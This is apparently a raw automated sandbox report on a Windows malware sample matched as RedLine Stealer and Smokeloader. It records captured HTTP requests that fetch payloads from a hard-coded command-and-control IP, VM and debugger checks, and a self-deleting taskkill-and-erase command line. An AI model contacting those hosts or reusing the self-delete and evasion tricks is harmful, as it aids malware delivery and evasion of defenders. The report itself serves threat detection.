Source: http://80.66.75.114/files/download |
Virustotal: Detection: 18% |
Source: http://80.66.75.114/6.75.114/add?substr=one&s=two |
Virustotal: Detection: 9% |
Source: http://80.66.75.114/files/download4/files/download |
Virustotal: Detection: 8% |
Source: http://80.66.75.114/files/downloadData |
Virustotal: Detection: 15% |
Source: http://80.66.75.114/ |
Virustotal: Detection: 16% |
Source: http://80.66.75.114/files/downloadP |
Virustotal: Detection: 12% |
Source: http://80.66.75.114/files/downloadN |
Virustotal: Detection: 8% |
Source: http://80.66.75.114/files/downloadL |
Virustotal: Detection: 9% |
Source: http://80.66.75.114/add?substr=one&s=two |
Virustotal: Detection: 15% |
Source: unknown |
TCP traffic detected without corresponding DNS query: 80.66.75.114 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_004018E0 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,LdrInitializeThunk,MultiByteToWideChar,MultiByteToWideChar, |
0_2_004018E0 |
Source: global traffic |
HTTP traffic detected: GET /add?substr=one&s=two HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 80.66.75.114Connection: Keep-AliveCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: BHost: 80.66.75.114Connection: Keep-AliveCache-Control: no-cache |
Source: file.exe, 00000000.00000003.1860003838.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1882788834.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1783507267.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1829531312.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1905305826.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1738300300.0000000000898000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1806125561.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2073934684.0000000002E31000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1928050185.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1760828703.000000000089A000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://80.66.75.114/ |
Source: file.exe, 00000000.00000003.1860003838.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1882788834.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1783507267.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1829531312.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1905305826.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1738300300.0000000000898000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1806125561.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1928050185.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1760828703.000000000089A000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://80.66.75.114/6.75.114/add?substr=one&s=two |
Source: file.exe, 00000000.00000003.1860003838.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1882788834.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1783507267.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1829531312.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1905305826.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1738300300.0000000000898000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1806125561.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1928050185.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2073485392.0000000000893000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1760828703.000000000089A000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://80.66.75.114/add?substr=one&s=two |
Source: file.exe, 00000000.00000003.1860003838.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1882788834.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1783507267.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1829531312.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1905305826.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1738300300.0000000000898000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1806125561.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1928050185.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1760828703.000000000089A000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://80.66.75.114/add?substr=one&s=twoi |
Source: file.exe, 00000000.00000003.1905305826.00000000008AC000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://80.66.75.114/files/download |
Source: file.exe, 00000000.00000003.1760828703.000000000089A000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://80.66.75.114/files/download4/files/download |
Source: file.exe, 00000000.00000003.1829531312.000000000089A000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://80.66.75.114/files/download4/files/downloadP |
Source: file.exe, 00000000.00000003.1860003838.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1882788834.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1829531312.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1905305826.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1928050185.000000000089A000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://80.66.75.114/files/downloadData |
Source: file.exe, 00000000.00000003.1860003838.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1882788834.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1783507267.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1829531312.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1905305826.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1738300300.0000000000898000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1806125561.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1928050185.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1760828703.000000000089A000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://80.66.75.114/files/downloadL |
Source: file.exe, 00000000.00000003.1860003838.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1882788834.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1783507267.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1829531312.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1905305826.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1738300300.0000000000898000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1806125561.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1928050185.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1760828703.000000000089A000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://80.66.75.114/files/downloadLMEM |
Source: file.exe, 00000000.00000003.1829531312.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1806125561.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1860003838.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1783507267.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1882788834.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1928050185.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1905305826.00000000008AC000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://80.66.75.114/files/downloadN |
Source: file.exe, 00000000.00000003.1860003838.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1882788834.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1783507267.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1905305826.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1738300300.0000000000898000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1806125561.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1928050185.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1760828703.000000000089A000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://80.66.75.114/files/downloadP |
Source: file.exe, 00000000.00000003.1860003838.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1882788834.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1783507267.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1829531312.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1905305826.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1738300300.0000000000898000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1806125561.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1928050185.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1760828703.000000000089A000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://80.66.75.114/wi |
Source: Amcache.hve.9.dr |
String found in binary or memory: http://upx.sf.net |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_00404530 |
0_2_00404530 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_00422900 |
0_2_00422900 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_004132D4 |
0_2_004132D4 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_00413AB9 |
0_2_00413AB9 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_004096D0 |
0_2_004096D0 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_005F9937 |
0_2_005F9937 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_0060353B |
0_2_0060353B |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_005F4797 |
0_2_005F4797 |
Source: 00000000.00000002.2073463747.00000000007C4000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12 |
Source: 00000000.00000002.2073287421.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23 |
Source: C:\Windows\SysWOW64\taskkill.exe |
WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "file.exe") |
Source: unknown |
Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe" |
|
Source: C:\Users\user\Desktop\file.exe |
Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "file.exe" /f & erase "C:\Users\user\Desktop\file.exe" & exit |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "file.exe" /f |
|
Source: C:\Users\user\Desktop\file.exe |
Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5356 -s 1504 |
|
Source: C:\Users\user\Desktop\file.exe |
Section loaded: apphelp.dll |
Source: C:\Users\user\Desktop\file.exe |
Section loaded: msimg32.dll |
Source: C:\Users\user\Desktop\file.exe |
Section loaded: wininet.dll |
Source: C:\Users\user\Desktop\file.exe |
Section loaded: msvcr100.dll |
Source: C:\Users\user\Desktop\file.exe |
Section loaded: iertutil.dll |
Source: C:\Users\user\Desktop\file.exe |
Section loaded: sspicli.dll |
Source: C:\Users\user\Desktop\file.exe |
Section loaded: windows.storage.dll |
Source: C:\Users\user\Desktop\file.exe |
Section loaded: wldp.dll |
Source: C:\Users\user\Desktop\file.exe |
Section loaded: profapi.dll |
Source: C:\Users\user\Desktop\file.exe |
Section loaded: kernel.appcore.dll |
Source: C:\Users\user\Desktop\file.exe |
Section loaded: ondemandconnroutehelper.dll |
Source: C:\Users\user\Desktop\file.exe |
Section loaded: winhttp.dll |
Source: C:\Users\user\Desktop\file.exe |
Section loaded: mswsock.dll |
Source: C:\Users\user\Desktop\file.exe |
Section loaded: iphlpapi.dll |
Source: C:\Users\user\Desktop\file.exe |
Section loaded: winnsi.dll |
Source: C:\Users\user\Desktop\file.exe |
Section loaded: urlmon.dll |
Source: C:\Users\user\Desktop\file.exe |
Section loaded: srvcli.dll |
Source: C:\Users\user\Desktop\file.exe |
Section loaded: netutils.dll |
Source: C:\Users\user\Desktop\file.exe |
Section loaded: uxtheme.dll |
Source: C:\Users\user\Desktop\file.exe |
Section loaded: propsys.dll |
Source: C:\Users\user\Desktop\file.exe |
Section loaded: edputil.dll |
Source: C:\Users\user\Desktop\file.exe |
Section loaded: windows.staterepositoryps.dll |
Source: C:\Users\user\Desktop\file.exe |
Section loaded: wintypes.dll |
Source: C:\Users\user\Desktop\file.exe |
Section loaded: appresolver.dll |
Source: C:\Users\user\Desktop\file.exe |
Section loaded: bcp47langs.dll |
Source: C:\Users\user\Desktop\file.exe |
Section loaded: slc.dll |
Source: C:\Users\user\Desktop\file.exe |
Section loaded: userenv.dll |
Source: C:\Users\user\Desktop\file.exe |
Section loaded: sppc.dll |
Source: C:\Users\user\Desktop\file.exe |
Section loaded: onecorecommonproxystub.dll |
Source: C:\Users\user\Desktop\file.exe |
Section loaded: onecoreuapcommonproxystub.dll |
Source: C:\Windows\SysWOW64\taskkill.exe |
Section loaded: version.dll |
Source: C:\Windows\SysWOW64\taskkill.exe |
Section loaded: mpr.dll |
Source: C:\Windows\SysWOW64\taskkill.exe |
Section loaded: framedynos.dll |
Source: C:\Windows\SysWOW64\taskkill.exe |
Section loaded: dbghelp.dll |
Source: C:\Windows\SysWOW64\taskkill.exe |
Section loaded: sspicli.dll |
Source: C:\Windows\SysWOW64\taskkill.exe |
Section loaded: srvcli.dll |
Source: C:\Windows\SysWOW64\taskkill.exe |
Section loaded: netutils.dll |
Source: C:\Windows\SysWOW64\taskkill.exe |
Section loaded: kernel.appcore.dll |
Source: C:\Windows\SysWOW64\taskkill.exe |
Section loaded: wbemcomn.dll |
Source: C:\Windows\SysWOW64\taskkill.exe |
Section loaded: winsta.dll |
Source: C:\Windows\SysWOW64\taskkill.exe |
Section loaded: amsi.dll |
Source: C:\Windows\SysWOW64\taskkill.exe |
Section loaded: userenv.dll |
Source: C:\Windows\SysWOW64\taskkill.exe |
Section loaded: profapi.dll |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_004083EE push ecx; ret |
0_2_00408401 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_0040FEBA push es; ret |
0_2_0040FEBB |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_0060407F push esp; retf |
0_2_00604087 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_00600121 push es; ret |
0_2_00600122 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_0060C575 push ss; retf |
0_2_0060C579 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_005F8655 push ecx; ret |
0_2_005F8668 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_0060467D push esp; retf |
0_2_0060467E |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_007C7443 push ecx; ret |
0_2_007C7444 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_007C68FD pushfd ; ret |
0_2_007C6905 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_007C7117 push ecx; ret |
0_2_007C7118 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_007C81F5 pushad ; ret |
0_2_007C81F9 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_007C5E78 pushad ; retf |
0_2_007C5EB4 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_007C9EC4 push ecx; ret |
0_2_007C9F0C |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_007C9E93 push ecx; ret |
0_2_007C9F0C |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_007C871B push es; ret |
0_2_007C871C |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_007C9F0D push ecx; ret |
0_2_007C9F0C |
Source: C:\Users\user\Desktop\file.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\taskkill.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: Amcache.hve.9.dr |
Binary or memory string: VMware |
Source: Amcache.hve.9.dr |
Binary or memory string: VMware Virtual USB Mouse |
Source: Amcache.hve.9.dr |
Binary or memory string: vmci.syshbin |
Source: Amcache.hve.9.dr |
Binary or memory string: VMware, Inc. |
Source: Amcache.hve.9.dr |
Binary or memory string: VMware20,1hbin@ |
Source: Amcache.hve.9.dr |
Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563 |
Source: Amcache.hve.9.dr |
Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000 |
Source: Amcache.hve.9.dr |
Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys |
Source: file.exe, 00000000.00000002.2073863942.0000000002DA0000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Hyper-V RAW |
Source: Amcache.hve.9.dr |
Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000 |
Source: Amcache.hve.9.dr |
Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev |
Source: Amcache.hve.9.dr |
Binary or memory string: c:/windows/system32/drivers/vmci.sys |
Source: Amcache.hve.9.dr |
Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000 |
Source: Amcache.hve.9.dr |
Binary or memory string: vmci.sys |
Source: Amcache.hve.9.dr |
Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0 |
Source: Amcache.hve.9.dr |
Binary or memory string: vmci.syshbin` |
Source: Amcache.hve.9.dr |
Binary or memory string: \driver\vmci,\driver\pci |
Source: file.exe, 00000000.00000002.2073485392.000000000086B000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Hyper-V RAW 7 |
Source: Amcache.hve.9.dr |
Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000 |
Source: Amcache.hve.9.dr |
Binary or memory string: VMware20,1 |
Source: Amcache.hve.9.dr |
Binary or memory string: Microsoft Hyper-V Generation Counter |
Source: Amcache.hve.9.dr |
Binary or memory string: NECVMWar VMware SATA CD00 |
Source: Amcache.hve.9.dr |
Binary or memory string: VMware Virtual disk SCSI Disk Device |
Source: Amcache.hve.9.dr |
Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom |
Source: Amcache.hve.9.dr |
Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk |
Source: Amcache.hve.9.dr |
Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver |
Source: Amcache.hve.9.dr |
Binary or memory string: VMware PCI VMCI Bus Device |
Source: Amcache.hve.9.dr |
Binary or memory string: VMware VMCI Bus Device |
Source: Amcache.hve.9.dr |
Binary or memory string: VMware Virtual RAM |
Source: Amcache.hve.9.dr |
Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1 |
Source: Amcache.hve.9.dr |
Binary or memory string: vmci.inf_amd64_68ed49469341f563 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_004018E0 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,LdrInitializeThunk,MultiByteToWideChar,MultiByteToWideChar, |
0_2_004018E0 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_00411002 mov eax, dword ptr fs:[00000030h] |
0_2_00411002 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_0040C4F1 mov eax, dword ptr fs:[00000030h] |
0_2_0040C4F1 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_005F092B mov eax, dword ptr fs:[00000030h] |
0_2_005F092B |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_00601269 mov eax, dword ptr fs:[00000030h] |
0_2_00601269 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_005F0D90 mov eax, dword ptr fs:[00000030h] |
0_2_005F0D90 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_005FC758 mov eax, dword ptr fs:[00000030h] |
0_2_005FC758 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_007C4A8B push dword ptr fs:[00000030h] |
0_2_007C4A8B |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_00407B06 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, |
0_2_00407B06 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_004084E5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, |
0_2_004084E5 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_00408679 SetUnhandledExceptionFilter, |
0_2_00408679 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_0040BFEB IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, |
0_2_0040BFEB |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_005F88E0 SetUnhandledExceptionFilter, |
0_2_005F88E0 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_005FC252 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, |
0_2_005FC252 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_005F7D6D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, |
0_2_005F7D6D |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_005F874C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, |
0_2_005F874C |
Source: C:\Users\user\Desktop\file.exe |
Code function: EnumSystemLocalesW, |
0_2_00418885 |
Source: C:\Users\user\Desktop\file.exe |
Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, |
0_2_00418910 |
Source: C:\Users\user\Desktop\file.exe |
Code function: EnumSystemLocalesW, |
0_2_00411112 |
Source: C:\Users\user\Desktop\file.exe |
Code function: GetLocaleInfoW, |
0_2_00418B63 |
Source: C:\Users\user\Desktop\file.exe |
Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, |
0_2_00418C89 |
Source: C:\Users\user\Desktop\file.exe |
Code function: GetLocaleInfoW, |
0_2_00418D8F |
Source: C:\Users\user\Desktop\file.exe |
Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, |
0_2_00418E5E |
Source: C:\Users\user\Desktop\file.exe |
Code function: GetLocaleInfoW, |
0_2_00411634 |
Source: C:\Users\user\Desktop\file.exe |
Code function: EnumSystemLocalesW, |
0_2_004187EA |
Source: C:\Users\user\Desktop\file.exe |
Code function: EnumSystemLocalesW, |
0_2_0041879F |
Source: C:\Users\user\Desktop\file.exe |
Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, |
0_2_006090C5 |
Source: C:\Users\user\Desktop\file.exe |
Code function: GetLocaleInfoW, |
0_2_0060189B |
Source: C:\Users\user\Desktop\file.exe |
Code function: EnumSystemLocalesW, |
0_2_00608A51 |
Source: C:\Users\user\Desktop\file.exe |
Code function: EnumSystemLocalesW, |
0_2_00608A06 |
Source: C:\Users\user\Desktop\file.exe |
Code function: EnumSystemLocalesW, |
0_2_00608AEC |
Source: C:\Users\user\Desktop\file.exe |
Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, |
0_2_00608B77 |
Source: C:\Users\user\Desktop\file.exe |
Code function: EnumSystemLocalesW, |
0_2_00601379 |
Source: C:\Users\user\Desktop\file.exe |
Code function: GetLocaleInfoW, |
0_2_00608DCA |
Source: C:\Users\user\Desktop\file.exe |
Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, |
0_2_00608EF0 |
Source: C:\Users\user\Desktop\file.exe |
Code function: GetLocaleInfoW, |
0_2_00608FF6 |
Source: Yara match |
File source: 0.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 0.2.file.exe.5f0e67.1.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 0.3.file.exe.740000.0.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 00000000.00000003.1680069236.0000000000740000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000002.2073287421.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000002.2073086290.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY |